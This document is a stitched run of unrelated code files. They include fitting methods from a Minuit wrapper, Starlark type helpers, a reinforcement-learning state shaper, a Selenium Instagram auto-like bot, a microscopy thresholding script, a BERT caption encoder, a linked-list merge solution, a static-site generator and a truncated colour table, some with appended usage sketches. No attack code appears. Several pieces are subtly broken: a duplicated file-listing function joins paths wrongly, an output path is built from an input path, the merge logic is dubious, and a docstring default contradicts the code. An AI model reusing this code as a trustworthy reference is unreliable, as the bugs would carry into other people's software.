) try: n = float(bound) in_sigma = True except TypeError: in_sigma = False if in_sigma: x_bound = self._normalize_bound(x, n) y_bound = self._normalize_bound(y, n) else: x_bound = self._normalize_bound(x, bound[0]) y_bound = self._normalize_bound(y, bound[1]) x_val = np.linspace(x_bound[0], x_bound[1], bins) y_val = np.linspace(y_bound[0], y_bound[1], bins) x_pos = self._var2pos[x] y_pos = self._var2pos[y] arg = list(self.args) result = np.empty((bins, bins), dtype=np.double) varg = np.array(arg, dtype=np.double) for i, x in enumerate(x_val): varg[x_pos] = x for j, y in enumerate(y_val): varg[y_pos] = y result[i, j] = self._fcn(varg) if subtract_min: result -= self._fmin.fval return x_val, y_val, result def mncontour(self, x, y, numpoints=100, sigma=1.0): """Two-dimensional MINOS contour scan. This scans over **x** and **y** and minimises all other free parameters in each scan point. This works as if **x** and **y** are fixed, while the other parameters are minimised by MIGRAD. This scan produces a statistical confidence region with the `profile likelihood method <https://en.wikipedia.org/wiki/Likelihood_function>`_. The contour line represents the values of **x** and **y** where the function passes the threshold that corresponds to `sigma` standard deviations (note that 1 standard deviations in two dimensions has a smaller coverage probability than 68 %). The calculation is expensive since it has to run MIGRAD at various points. **Arguments:** - **x** string variable name of the first parameter - **y** string variable name of the second parameter - **numpoints** number of points on the line to find. Default 20. - **sigma** number of sigma for the contour line. Default 1.0. **Returns:** x MINOS error struct, y MINOS error struct, contour line contour line is a list of the form [[x1,y1]...[xn,yn]] .. seealso:: :meth:`contour` :meth:`mnprofile` """ if not self._fmin: raise ValueError("Run MIGRAD first") ix = self._var2pos[x] iy = self._var2pos[y] vary = self._free_parameters() if x not in vary or y not in vary: raise ValueError("mncontour cannot be run on fixed parameters.") with mutil.TemporaryUp(self._fcn, sigma): mnc = MnContours(self._fcn, self._fmin._src, self.strategy) mex, mey, ce = mnc(ix, iy, numpoints) return mex, mey, ce def draw_mncontour(self, x, y, nsigma=2, numpoints=100): """Draw MINOS contour. **Arguments:** - **x**, **y** parameter name - **nsigma** number of sigma contours to draw - **numpoints** number of points to calculate for each contour **Returns:** contour .. seealso:: :meth:`mncontour` .. plot:: plots/mncontour.py :include-source: """ from matplotlib import pyplot as plt from matplotlib.contour import ContourSet c_val = [] c_pts = [] for sigma in range(1, nsigma + 1): pts = self.mncontour(x, y, numpoints, sigma)[2] # close curve pts.append(pts[0]) c_val.append(sigma) c_pts.append([pts]) # level can have more than one contour in mpl cs = ContourSet(plt.gca(), c_val, c_pts) plt.clabel(cs) plt.xlabel(x) plt.ylabel(y) return cs def draw_contour(self, x, y, bins=50, bound=2): """Convenience wrapper for drawing contours. The arguments are the same as :meth:`contour`. Please read the docs of :meth:`contour` and :meth:`mncontour` to understand the difference between the two. .. 
seealso:: :meth:`contour` :meth:`draw_mncontour` """ from matplotlib import pyplot as plt vx, vy, vz = self.contour(x, y, bins, bound, subtract_min=True) v = [self.errordef * (i + 1) for i in range(4)] CS = plt.contour(vx, vy, vz, v) plt.clabel(CS, v) plt.xlabel(x) plt.ylabel(y) plt.axhline(self.values[y], color="k", ls="--") plt.axvline(self.values[x], color="k", ls="--") return vx, vy, vz def _free_parameters(self): return (mp.name for mp in self._last_state if not mp.is_fixed) def _normalize_bound(self, vname, bound): try: n = float(bound) in_sigma = True except TypeError: in_sigma = False pass if in_sigma: if not self.accurate: warn( "Specified nsigma bound, but error matrix is not accurate", mutil.IMinuitWarning, ) start = self.values[vname] sigma = self.errors[vname] bound = (start - n * sigma, start + n * sigma) return bound def _copy_state_if_needed(self): if self._last_state == self._init_state or ( self._fmin and self._last_state == self._fmin._src.state ): self._last_state = MnUserParameterState(self._last_state) def _pedantic(self, parameters, kwds): for vn in parameters: if vn not in kwds and "limit_%s" % vn not in kwds: warn( f"Parameter {vn} has neither initial value nor limits", mutil.InitialParamWarning, stacklevel=3, ) # Helper classes class BasicView: """Dict-like view of parameter state. Derived classes need to implement methods _set and _get to access specific properties of the parameter state.""" _minuit = None def __init__(self, minuit): self._minuit = minuit def __iter__(self): return self._minuit._pos2var.__iter__() def __len__(self): return len(self._minuit._pos2var) def keys(self): return self._minuit._pos2var def items(self): return [(name, self._get(k)) for (k, name) in enumerate(self)] def values(self): return [self._get(k) for k in range(len(self))] def __getitem__(self, key): if isinstance(key, slice): ind = range(*key.indices(len(self))) return [self._get(i) for i in ind] i = key if mutil._is_int(key) else self._minuit._var2pos[key] if i < 0: i += len(self) if i < 0 or i >= len(self): raise IndexError return self._get(i) def __setitem__(self, key, value): self._minuit._copy_state_if_needed() if isinstance(key, slice): ind = range(*key.indices(len(self))) if hasattr(value, "__getitem__") and hasattr(value, "__len__"): if len(value) != len(ind): raise ValueError("length of argument does not match slice") for i, v in zip(ind, value): self._set(i, v) else: # basic broadcasting for i in ind: self._set(i, value) return i = key if mutil._is_int(key) else self._minuit._var2pos[key] if i < 0: i += len(self) if i < 0 or i >= len(self): raise IndexError self._set(i, value) def __repr__(self): s = "<%s of Minuit at %x>" % (self.__class__.__name__, id(self._minuit)) for (k, v) in self.items(): s += "\n {0}: {1}".format(k, v) return s class ArgsView: """List-like view of parameter values.""" _minuit = None def __init__(self, minuit): self._minuit = minuit def __len__(self): return len(self._minuit._pos2var) def __getitem__(self, key): if isinstance(key, slice): ind = range(*key.indices(len(self))) return [self._minuit._last_state[i].value for i in ind] i = key if i < 0: i += len(self) if i < 0 or i >= len(self): raise IndexError return self._minuit._last_state[i].value def __setitem__(self, key, value): self._minuit._copy_state_if_needed() if isinstance(key, slice): ind = range(*key.indices(len(self))) for i, v in zip(ind, value): self._minuit._last_state.set_value(i, v) else: i = key if i < 0: i += len(self) if i < 0 or i >= len(self): raise IndexError 
self._minuit._last_state.set_value(i, value) def __repr__(self): s = "<ArgsView of Minuit at %x>" % id(self._minuit) for v in self: s += "\n {0}".format(v) return s class ValueView(BasicView): """Dict-like view of parameter values.""" def _get(self, i): return self._minuit._last_state[i].value def _set(self, i, value): self._minuit._last_state.set_value(i, value) class ErrorView(BasicView): """Dict-like view of parameter errors.""" def _get(self, i): return self._minuit._last_state[i].error def _set(self, i, value): self._minuit._last_state.set_error(i, value) class FixedView(BasicView): """Dict-like view of whether parameters are fixed.""" def _get(self, i): return self._minuit._last_state[i].is_fixed def _set(self, i, fix): if fix: self._minuit._last_state.fix(i) else: self._minuit._last_state.release(i)
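
# ---------------------------------------------------------------------------
# Minimal usage sketch (illustration only), mirroring the examples in the
# docstrings above: fit a simple least-squares function, then run HESSE and
# MINOS for the uncertainties. The cost function and starting values are
# arbitrary demo inputs.
# ---------------------------------------------------------------------------
if __name__ == "__main__":

    def cost(x, y):
        return (x - 2) ** 2 + (y - 3) ** 2

    m = Minuit(cost, x=0.0, y=0.0, error_x=0.1, error_y=0.1,
               errordef=Minuit.LEAST_SQUARES)
    m.migrad()   # run the minimizer
    m.hesse()    # parabolic errors from the Hesse matrix
    m.minos()    # asymmetric confidence intervals

    print(m.values["x"], m.values["y"])   # best-fit parameters (~2, ~3)
    print(m.errors["x"], m.errors["y"])   # HESSE errors
    print(m.fval, m.valid)                # minimum FCN value and validity flag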
# Only used for PyTorch open source BUCK build """Provides macros for queries type information.""" _SELECT_TYPE = type(select({"DEFAULT": []})) def is_select(thing): return type(thing) == _SELECT_TYPE def is_unicode(arg): """Checks if provided instance has a unicode type. Args: arg: An instance to check. type: Any Returns: True for unicode instances, False otherwise. rtype: bool """ return hasattr(arg, "encode") _STRING_TYPE = type("") def is_string(arg): """Checks if provided instance has a string type. Args: arg: An instance to check. type: Any Returns: True for string instances, False otherwise. rtype: bool """ return type(arg) == _STRING_TYPE _LIST_TYPE = type([]) def is_list(arg): """Checks if provided instance has a list type. Args: arg: An instance to check. type: Any Returns: True for list instances, False otherwise. rtype: bool """ return type(arg) == _LIST_TYPE _DICT_TYPE = type({}) def is_dict(arg): """Checks if provided instance has a dict type. Args: arg: An instance to check. type: Any Returns: True for dict instances, False otherwise. rtype: bool """ return type(arg) == _DICT_TYPE _TUPLE_TYPE = type(()) def is_tuple(arg): """Checks if provided instance has a tuple type. Args: arg: An instance to check. type: Any Returns: True for tuple instances, False otherwise. rtype: bool """ return type(arg) == _TUPLE_TYPE def is_collection(arg): """Checks if provided instance is a collection subtype. This will either be a dict, list, or tuple. """ return is_dict(arg) or is_list(arg) or is_tuple(arg) _BOOL_TYPE = type(True) def is_bool(arg): """Checks if provided instance is a boolean value. Args: arg: An instance ot check. type: Any Returns: True for boolean values, False otherwise. rtype: bool """ return type(arg) == _BOOL_TYPE _NUMBER_TYPE = type(1) def is_number(arg): """Checks if provided instance is a number value. Args: arg: An instance ot check. type: Any Returns: True for number values, False otherwise. rtype: bool """ return type(arg) == _NUMBER_TYPE _STRUCT_TYPE = type(struct()) # Starlark returns the same type for all structs def is_struct(arg): """Checks if provided instance is a struct value. Args: arg: An instance ot check. type: Any Returns: True for struct values, False otherwise. rtype: bool """ return type(arg) == _STRUCT_TYPE type_utils = struct( is_bool = is_bool, is_number = is_number, is_string = is_string, is_unicode = is_unicode, is_list = is_list, is_dict = is_dict, is_tuple = is_tuple, is_collection = is_collection, is_select = is_select, is_struct = is_struct, )
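
# ---------------------------------------------------------------------------
# Usage sketch (illustration only). In a real .bzl macro this struct would be
# brought in with load() from wherever this file lives in the repo; that path
# is not shown here because it is not known. The helper below demonstrates the
# intended pattern: branch on the runtime type of a macro argument before
# manipulating it, since select() values cannot be iterated.
# ---------------------------------------------------------------------------
def _normalize_deps(deps):
    """Returns deps as a list, accepting None, a single label, a list/tuple, or a select()."""
    if deps == None:
        return []
    if type_utils.is_select(deps):
        # Leave select() expressions untouched; the build system resolves them later.
        return deps
    if type_utils.is_string(deps) or type_utils.is_unicode(deps):
        return [deps]
    if type_utils.is_list(deps) or type_utils.is_tuple(deps):
        return list(deps)
    fail("deps must be a label, a list of labels, or a select()")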
# Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from abc import abstractmethod from .abs_shaper import AbsShaper class StateShaper(AbsShaper): """State shaper class. A state shaper is used to convert a decision event and snapshot list to model input. """ @abstractmethod def __call__(self, decision_event, snapshot_list): pass def reset(self): """Reset stateful members, if any, to their states at the beginning of an episode.""" pass
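
# ---------------------------------------------------------------------------
# Illustrative subclass (not part of the original module): a minimal shaper
# that turns a decision event into a flat numpy feature vector for a model.
# The event attributes used below (`tick`, `station_idx`) are made-up
# placeholders -- a real scenario would read its own fields and typically also
# query `snapshot_list` for historical state.
# ---------------------------------------------------------------------------
import numpy as np


class SimpleStateShaper(StateShaper):
    """Concatenates a couple of event fields into a fixed-size model input."""

    def __call__(self, decision_event, snapshot_list):
        # Hypothetical fields; replace with the scenario's actual attributes.
        return np.array(
            [decision_event.tick, decision_event.station_idx],
            dtype=np.float32,
        )

    def reset(self):
        # This shaper keeps no per-episode state, so there is nothing to clear.
        pass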
from selenium import webdriver from selenium.webdriver.common.action_chains import ActionChains import os import time import configparser class InstagramBot: def __init__(self, username, password): """ Initialises Instagram Bot object. Args: username: The Instagram Username password: The Instagram Password Attributes: driver: Selenium.webdriver.chrome: Used to automate browser actions. """ self.username = username self.password = password self.driver = webdriver.Chrome("./chromedriver") self.base_url = "https://www.instagram.com" self.login() def login(self): self.driver.get("{}/accounts/login/".format(self.base_url)) time.sleep(0.2) self.driver.find_element_by_name("username").send_keys(self.username) self.driver.find_element_by_name("password").send_keys(self.password) self.driver.find_element_by_xpath("//div[contains(text(), 'Log In')]").click() time.sleep(1.2) def nav_user(self, user): self.driver.get("{}/{}/".format(self.base_url, user)) time.sleep(0.2) def follow_user(self, user): self.nav_user(user) follow_button = self.driver.find_element_by_xpath("//button[contains(text(), 'Follow')]") follow_button.click() def unfollow_user(self, user): self.nav_user(user) self.driver.find_element_by_xpath("//button[contains(text(), 'Following')]").click() def like_all_photos(self, user): self.nav_user(user) time.sleep(2) # action_chains = ActionChains(self.driver) # # action_chains.double_click(image).perform() # image = self.driver.find_element_by_css_selector("div article div div div div a div") images = self.driver.find_elements_by_css_selector("div article div div div div a:nth-child(1)") print(len(images)) for image in images: self.like_photo(image) time.sleep(1) def like_photo(self, image): image.click() time.sleep(1.5) # like_button = self.driver.find_element_by_xpath("/html/body/div[3]/div[2]/div/article/div[2]/section[1]/span[1]/button") # like_button.click() exit_button = self.driver.find_element_by_xpath("/html/body/div[3]/button[1]") exit_button.click() if __name__ == "__main__": config = './config.ini' cparser = configparser.ConfigParser() cparser.read(config) username = cparser["AUTH"]["User"] password = cparser["AUTH"]["Pass"] ig_bot = InstagramBot(username, password) ig_bot.like_all_photos("Undertaker")
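
# ---------------------------------------------------------------------------
# Optional refinement sketch (illustration only, not something the original
# bot implements): the fixed time.sleep() calls above can be replaced with
# explicit waits, which are more robust when the page loads slowly. This uses
# the standard Selenium WebDriverWait API; `wait_for` is a helper introduced
# here, not part of the bot.
# ---------------------------------------------------------------------------
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait


def wait_for(driver, locator, timeout=10):
    """Blocks until the element described by `locator` is present, then returns it."""
    return WebDriverWait(driver, timeout).until(
        EC.presence_of_element_located(locator)
    )

# Example replacement for the sleep before filling the login form:
#     username_field = wait_for(self.driver, (By.NAME, "username"))
#     username_field.send_keys(self.username)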
# %% import os, sys import re import cv2 import pandas as pd import numpy as np import matplotlib.pyplot as plt from numpy import linspace, meshgrid from scipy.interpolate import griddata import matplotlib.image as mpimg import matplotlib.style import matplotlib as mpl mpl.style.use('default') from PIL import Image # Functions Section Begins ----------------------------------------------------- # def dircheck(targetpaths): """ dircheck checks the target folder and create the folder if it does not exist. targetdirlist: list of folderpath """ # print(type(targetpaths)) if isinstance(targetpaths, str): print(os.path.exists(targetpaths)) if not os.path.exists(targetpaths): os.makedirs(targetpaths) elif isinstance(targetpaths, list): for path in targetpaths: if not os.path.exists(path): os.makedirs(path) def listfiles(path, extension = None): filelist = [] fileabslist = [] for directory, dir_names, file_names in os.walk(path): # print(file_names) for file_name in file_names: if (not file_name.startswith('.')) & (file_name.endswith(extension)): filepath_tmp = os.path.join(directory, file_name) filelist.append(file_name) fileabslist.append(filepath_tmp) return {'filelist': filelist, 'fileabslist': fileabslist} def getprocessedimg(op_dir, pattern = r'(.+?).'): """ NOT USING getprocessedimg check the output folder and create a list of processed data pattern: the pattern re search """ processed_img = [] for (directory, dir_names, file_names) in os.walk(op_dir): for file_name in file_names: # print(file_name) # search the processed files by using re.search m = re.search(pattern, file_name) if m: # print(m) file_name_temp = m.group(1) processed_img.append(file_name_temp) # replace the duplicated filenames processed_img = list(set(processed_img)) return (processed_img) def listfiles(path, extension = None): filelist = [] fileabslist = [] for directory, dir_names, file_names in os.walk(path): # print(file_names) for file_name in file_names: if (not file_name.startswith('.')) & (file_name.endswith(extension)): filepath_tmp = os.path.join(directory, file_name + extension) filelist.append(file_name) fileabslist.append(filepath_tmp) return {'filelist': filelist, 'fileabslist': fileabslist} # Functions Section Ends ----------------------------------------------------- # # %% nchannels = 2 dir_check = [] # %% # input folder path = '/Volumes/LaCie_DataStorage/xiaochao_wei_STORM imaging/STORM_imaging' analysis_dir = 'analysis_20190308' spacialtestdir = 'spacial_test' intcsv_dir = 'spacialdata_local_pad_grid' intcsv_path = os.path.join(path, analysis_dir, spacialtestdir, intcsv_dir) print(intcsv_path) # output folder nnd_dir = 'nnd' intcsv_histo_dir = 'int_grid_histo' intcsv_histo_summary_dir = 'int_grid_histo_summary' intcsv_bw = 'int_grid_bw' intcsv_histo_path = os.path.join(path, analysis_dir, spacialtestdir, nnd_dir, intcsv_histo_dir) intcsv_histo_summary_path = os.path.join(path, analysis_dir, spacialtestdir, nnd_dir, intcsv_histo_summary_dir) for c in range(nchannels): dir_check.append(os.path.join(intcsv_histo_path, str(c+1))) dir_check.append(os.path.join(intcsv_bw, str(c+1))) dir_check.append(intcsv_histo_summary_path) dircheck(dir_check) # %% # Grouped by the channels and treatment ------------------------------------------ # filelist = {} filenamelist = listfiles(os.path.join(intcsv_path, '1'), '.tif')['filelist'] filedir = ['ip_filename', 'ip_path', 'op_hist', 'op_bw'] treatment = ['wildtype', 'knockout'] channel = list(range(2)) print(channel) # group the data by the treatment for c in channel: 
filelist[str(c+1)] = {} for group in treatment: filelist[str(c+1)][group] = {} # create list filelist_temp = [] for l in filenamelist: if group == 'wildtype': x = re.search('(.*)_w{1}[0-9]{1}_(.*)', l) else: x = re.search('(.*)_k{1}[0-9]{1}_(.*)', l) try: found = x.group(0) filelist_temp.append(found) except AttributeError: found = '' ip_filepath = [] op_hist_filepath = [] op_bw_filepath = [] for f in filelist_temp: filepath_tmp = os.path.join(intcsv_path, str(c+1), f) ip_filepath.append(filepath_tmp) filename_tmp_png = f.replace('.tif', '.png') op_hist_filepath_temp = os.path.join(intcsv_histo_path, str(c+1), filename_tmp_png) op_hist_filepath.append(op_hist_filepath_temp) op_bw_filepath_temp = os.path.join(intcsv_bw, str(c+2), filepath_tmp) op_bw_filepath.append(op_bw_filepath_temp) filelist[str(c+1)][group][filedir[0]] = filelist_temp filelist[str(c+1)][group][filedir[1]] = ip_filepath filelist[str(c+1)][group][filedir[2]] = op_hist_filepath filelist[str(c+1)][group][filedir[3]] = op_bw_filepath print(filelist) # %% threshold_c = {'1': 400, '2': 600,} # create binary by thresholding for c in channel: print('channel: {}'.format(c)) for group in treatment: for i in range(len(filelist[str(c+1)][group][filedir[0]])): images = [] # load data filepath = filelist[str(c+1)][group][filedir[1]][i] print(filepath) im = np.array(Image.open(filepath)) print(type(im)) # print array print(im) images.append(im) # visulization ---------------------------------------------- # ''' # brightness adjustment factor_up = 0.3 max_value = np.max(im) * factor_up print(max_value) im_scale = im * (((2**16-1) - 0) / (max_value - 0)) # assign oversaturated pixel to the max value np.putmask(im_scale, im_scale>(2**16-1), (2**16-1)) # conver to 16bit im_scale_16 = im_scale.astype("uint16") # show image cv2.imshow('image', im_scale_16) cv2.waitKey(0) cv2.destroyAllWindows() ''' # thresholding ---------------------------------------------- # ret,thresh1 = cv2.threshold(im, threshold_c[str(c+1)], (2**16-1), cv2.THRESH_BINARY) thresh1 = np.array(thresh1, dtype=np.uint8) plt.imshow(thresh1) images.append(thresh1) print(thresh1.dtype) print(np.max(thresh1)) ret, labels= cv2.connectedComponents(thresh1) images.append(labels) for i in range(len(images)): plt.subplot(2, 2, i+1) plt.imshow(images[i], 'gray') plt.xticks([]) plt.yticks([]) break break break
import copy import torch import torch.nn as nn import numpy as np import pytorch_transformers import utils.io as io class CapEncoderConstants(io.JsonSerializableClass): def __init__(self): super().__init__() self.model = 'BertModel' self.tokenizer = 'BertTokenizer' self.pretrained_weights = 'bert-base-uncased' self.max_len = 15 self.output_attentions = False class CapEncoder(nn.Module,io.WritableToFile): def __init__(self,const): super().__init__() self.const = copy.deepcopy(const) output_hidden_states = False if self.const.output_attentions is True: output_hidden_states = True self.model = getattr( pytorch_transformers, self.const.model).from_pretrained( self.const.pretrained_weights, output_hidden_states=output_hidden_states, output_attentions=self.const.output_attentions) self.tokenizer = getattr( pytorch_transformers, self.const.tokenizer).from_pretrained(self.const.pretrained_weights) @property def pad_token(self): return self.tokenizer.pad_token @property def cls_token(self): return self.tokenizer.cls_token @property def sep_token(self): return self.tokenizer.sep_token @property def pad_token_id(self): return self.tokenizer._convert_token_to_id(self.pad_token) @property def mask_token(self): return self.tokenizer.mask_token @property def mask_token_id(self): return self.tokenizer._convert_token_to_id(self.mask_token) def tokenize(self,caption): token_ids = self.tokenizer.encode(caption,add_special_tokens=True) tokens = [ self.tokenizer._convert_id_to_token(t_id) for t_id in token_ids] return token_ids, tokens def pad_list(self,list_to_pad,pad_item,max_len): L = len(list_to_pad) if L==max_len: padded_list = list_to_pad[:] elif L > max_len: padded_list = list_to_pad[:max_len] else: padding = [] for i in range(max_len-L): padding.append(pad_item) padded_list = list_to_pad + padding return padded_list def mask_batch(self,token_ids,mask_prob=0.1): B,L = token_ids.size() mask = torch.rand_like(token_ids.float()) < torch.tensor(mask_prob) mask = mask.long() token_ids = (1-mask)*token_ids + mask*torch.tensor(self.mask_token_id) return token_ids def tokenize_batch(self,captions,pad_tokens=True,max_len=None): batch_token_ids = [] batch_tokens = [] token_lens = [] max_token_len = 0 for cap in captions: token_ids, tokens = self.tokenize(cap) batch_token_ids.append(token_ids) batch_tokens.append(tokens) token_len = len(tokens) token_lens.append(token_len) max_token_len = max(max_token_len,token_len) if max_len is not None: max_token_len = min(max_len,max_token_len) if pad_tokens is True: for i in range(len(captions)): batch_token_ids[i] = self.pad_list( batch_token_ids[i], self.pad_token_id, max_token_len) batch_tokens[i] = self.pad_list( batch_tokens[i], self.pad_token, max_token_len) return batch_token_ids, batch_tokens, token_lens def get_token_mask(self,batch_tokens): B = len(batch_tokens) T = len(batch_tokens[0]) mask = np.zeros([B,T],dtype=np.float32) for b in range(B): tokens = batch_tokens[b] for t in range(T): if tokens[t] in [self.pad_token,self.sep_token,self.cls_token]: mask[b,t] = 1 return mask def select_noun_embed(self,embed,noun_token_ids): B,max_noun_tokens = noun_token_ids.size() D = embed.size(2) noun_embed = torch.zeros([B,max_noun_tokens,D],dtype=torch.float32).cuda() mask = torch.zeros([B,max_noun_tokens],dtype=torch.float32).cuda() for b in range(B): for j in range(max_noun_tokens): token_id = noun_token_ids[b,j] if token_id == -1: mask[b,j] = 1 continue noun_embed[b,j] = embed[b,token_id] return noun_embed, mask def select_noun_att(self,word_word_att,noun_token_ids): 
B,max_noun_tokens = noun_token_ids.size() noun_noun_att = torch.zeros( [B,max_noun_tokens,max_noun_tokens],dtype=torch.float32).cuda() for b in range(B): L= 0 token_ids = noun_token_ids[b] for i in range(max_noun_tokens): if token_ids[i] == -1: break else: L+=1 if L==0: continue idx = token_ids[:L].long() att = word_word_att[b,idx] att = att[:,idx] noun_noun_att[b,:L,:L] = att return noun_noun_att def forward(self,batch_token_ids): output = self.model(batch_token_ids) if self.const.output_attentions is True: embed = output[0] att = output[-1] return embed, att else: embed = output[0] return embed if __name__=='__main__': const = CapEncoderConstants() const.output_attentions = True cap_encoder = CapEncoder(const) caps = ['i am here for fun','what are you here for?'] token_ids, tokens, token_lens = cap_encoder.tokenize_batch(caps) token_ids = torch.LongTensor(token_ids) output = cap_encoder(token_ids) import pdb; pdb.set_trace()
# Singly-linked lists are already defined with this interface: # class ListNode(object): # def __init__(self, x): # self.value = x # self.next = None # def mergeTwoLinkedLists(l1, l2): if l1 == None and l2 == None: return None merged = ListNode(None) ret = merged # prev = merged.value while l1 != None or l2 != None: if l1 != None: if l2 == None and l1.next == None: merged.value = l1.value break if l2 != None: if l1 == None and l2.next == None: merged.value = l2.value break m1 = l2.value if l1 == None else l1.value m2 = l1.value if l2 == None else l2.value val = min(m2 if m1 == None else m1, m1 if m2 == None else m2) merged.next = ListNode(None) merged.value = val merged = merged.next if l1 != None and val >= l1.value: l1 = l1.next elif l2 != None and val >= l2.value: l2 = l2.next return ret
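# A small usage sketch for mergeTwoLinkedLists (not part of the original
# solution). The ListNode class and the helpers below are defined here only for
# illustration; the challenge environment normally provides ListNode with
# exactly this interface.

class ListNode(object):
    def __init__(self, x):
        self.value = x
        self.next = None


def build_list(values):
    # build a singly-linked list from a Python list and return its head
    head = None
    for v in reversed(values):
        node = ListNode(v)
        node.next = head
        head = node
    return head


def to_list(node):
    # collect node values back into a Python list
    out = []
    while node is not None:
        out.append(node.value)
        node = node.next
    return out


print(to_list(mergeTwoLinkedLists(build_list([1, 3, 5]), build_list([2, 4]))))
# expected output: [1, 2, 3, 4, 5]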
#!/usr/bin/env python """Static site generation for help.rerobots.net SCL <[email protected]> Copyright (C) 2018 rerobots, Inc. """ from datetime import datetime import sys from markdown.extensions.toc import TocExtension from markdown import markdown PREFIX="""<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> {OPENGRAPHBLOB} <title>{TITLE}</title> <link href="/extern/css/bootstrap.min.css" rel="stylesheet"> <link href="/extern/css/sticky-footer.css" rel="stylesheet"> <script src="/extern/js/jquery.min.js"></script> <script src="/extern/js/bootstrap.min.js"></script> <link rel="stylesheet" href="/css/main.css"> <link rel="stylesheet" href="/css/styles.css"> </head> <body> <a class="sr-only sr-only-focusable" href="#main-content">Skip to main content</a> <nav class="navbar navbar-default navbar-static-top"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar-collapse-1" aria-expanded="false"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="https://rerobots.net/"> <span class="prefix-re">re</span>robots </a> </div> <div class="collapse navbar-collapse" id="navbar-collapse-1"> <ul class="nav navbar-nav navbar-right"> <li><a href="/index.html">introduction</a></li> <li><a href="/prelim.html">preliminaries</a></li> <li><a href="/guides.html">guides</a></li> <li><a href="/workspaces/">workspaces</a></li> <li><a href="/api.html">API</a></li> <li><a href="/references.html">references</a></li> </ul> </div> </div> </nav> <div class="container" id="main-content">""" SUFFIX="""</div> <footer class="footer"> <div class="container"><div class="row"> <div class="col-md-6 col-sm-6 text-muted"> Copyright &copy; 2021 rerobots, Inc.<br /> <a class="footer-left" href="{REPOURL}">Edit this page</a>; <a rel="license" href="https://github.com/rerobots/doc-help/" id="commons-license">free, open source</a>. </div> <div class="col-md-6 col-sm-6 text-muted"> <span id="update-date">updated {DATESTAMP}</span> <a href="https://rerobots.net/site/terms-of-service">terms of service</a> <a href="https://rerobots.net/contact">contact</a> </div> </div></div> </footer> {ENDBLOCK} </body> </html> """ def get_ogheader(blob, url=None): """extract Open Graph markup into a dict The OG header section is delimited by a line of only `---`. Note that the page title is not provided as Open Graph metadata if the image metadata is not specified. """ found = False ogheader = dict() for line in blob.split('\n'): if line == '---': found = True break if line.startswith('image: '): toks = line.split() assert len(toks) == 2 ogheader['image'] = toks[1] if not found: ogheader = dict() # Ignore any matches as false positives return ogheader if url is not None: assert 'url' not in ogheader ogheader['url'] = url for line in blob.split('\n'): if line.startswith('# '): ogheader['title'] = line[2:] return ogheader def create_ogblob(ogheader): """create <meta> tags from Open Graph dict if ogheader is empty dict, then return empty string. if ogheader has some values but not the minimum, then raise ValueError. if og:image is a path, not a URL of http or https scheme, then 'https://help.rerobots.net/' is prepended to it. 
""" if len(ogheader) == 0: return '' if not ('title' in ogheader and 'url' in ogheader and 'image' in ogheader): raise ValueError('some but not all required metadata provided for Open Graph') if not (ogheader['image'].startswith('http://') or ogheader['image'].startswith('https://')): ogheader['image'] = 'https://help.rerobots.net/' + ogheader['image'] blob = """ <meta property="og:type" content="website" /> <meta property="og:url" content="{URL}" /> <meta property="og:title" content="{TITLE}" /> <meta property="og:image" content="{IMAGE}" /> """.format(URL=ogheader['url'], TITLE=ogheader['title'], IMAGE=ogheader['image']) return blob def strip_header(blob): ind = blob.find('\n---\n') if ind == -1: return blob return blob[(ind+5):] def from_template(body, path, baseurl=None, repo_url=None): if repo_url is None: repo_url = 'https://github.com/rerobots/doc-help/blob/master/' + path if baseurl is None: baseurl = 'https://help.rerobots.net/' tstamp = datetime.utcnow().strftime('%Y-%m-%d') if path.endswith('.md'): path = path[:-2] + 'html' if path == 'index.html' or path.endswith('/index.html'): path = path[:-len('index.html')] url = baseurl + path ogheader = get_ogheader(body, url=url) if len(ogheader) > 0: body = strip_header(body) ogblob = create_ogblob(ogheader) title = ogheader.get('title', '') if len(title) > 0: title += ' - ' title += 'rerobots help' out = PREFIX.format(OPENGRAPHBLOB=ogblob, TITLE=title) out += markdown(body, output_format='html5', extensions=[TocExtension(), 'markdown.extensions.tables', 'markdown.extensions.codehilite']) if '$$' in body: endblock = '<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.0/MathJax.js?config=TeX-MML-AM_CHTML"></script>' else: endblock = '' out += SUFFIX.format(DATESTAMP=tstamp, ENDBLOCK=endblock, REPOURL=repo_url) return out def main(argv): assert len(argv) == 2 or len(argv) == 3 path = argv[1] if len(argv) == 3: baseurl = argv[2] else: baseurl = None with open(path, 'rt') as fp: return from_template(fp.read(), path, baseurl) if __name__ == '__main__': print(main(sys.argv))
# -*- coding: utf-8 -*- """ colNamedColours.py Author: SMFSW Copyright (c) 2016-2021 SMFSW Description: HTMLrestricted & CSS color space reference & classes """ # TODO: add search nearest # TODO: ajouter la gestion des exceptions lorsque le nom de la couleur n'est pas trouvee from colHEX import ColHEX as cHEX class RefHTMLrestricted(object): """ HTMLrestricted reference dicts & methods """ @classmethod def searchref_HTMLrestricted(cls, typ='HEX', srch=''): """ Search in restricted HTML colors dict :param typ: returned type :param srch: item to search :return: item found returned as type passed in parameter """ try: for idx, (h, r, ms) in cls.ref_colHTMLrestricted.items(): if h == srch.upper() or r == srch or ms == srch or idx == srch.lower(): if typ == 'HEX': return h elif typ == 'RGB': return r elif typ == 'MSCode': return ms else: # if typ == 'Name': return idx except KeyError: pass lfields_HTMLrestricted = ['Name', 'HEX', 'RGB', 'MSCode'] ref_colHTMLrestricted = { # restricted set of HTML colors reference 'fuchsia': ('#FF00FF', (255, 0, 255), 16711935), 'purple' : ('#800080', (128, 0, 128), 8388736), 'blue' : ('#0000FF', (0, 0, 255), 16711680), 'navy' : ('#000080', (0, 0, 128), 8388608), 'aqua' : ('#00FFFF', (0, 255, 255), 16776960), 'teal' : ('#008080', (0, 128, 128), 8421376), 'lime' : ('#00FF00', (0, 255, 0), 65280), 'green' : ('#008000', (0, 128, 0), 32768), 'yellow' : ('#FFFF00', (255, 255, 0), 65535), 'olive' : ('#808000', (128, 128, 0), 32896), 'red' : ('#FF0000', (255, 0, 0), 255), 'maroon' : ('#800000', 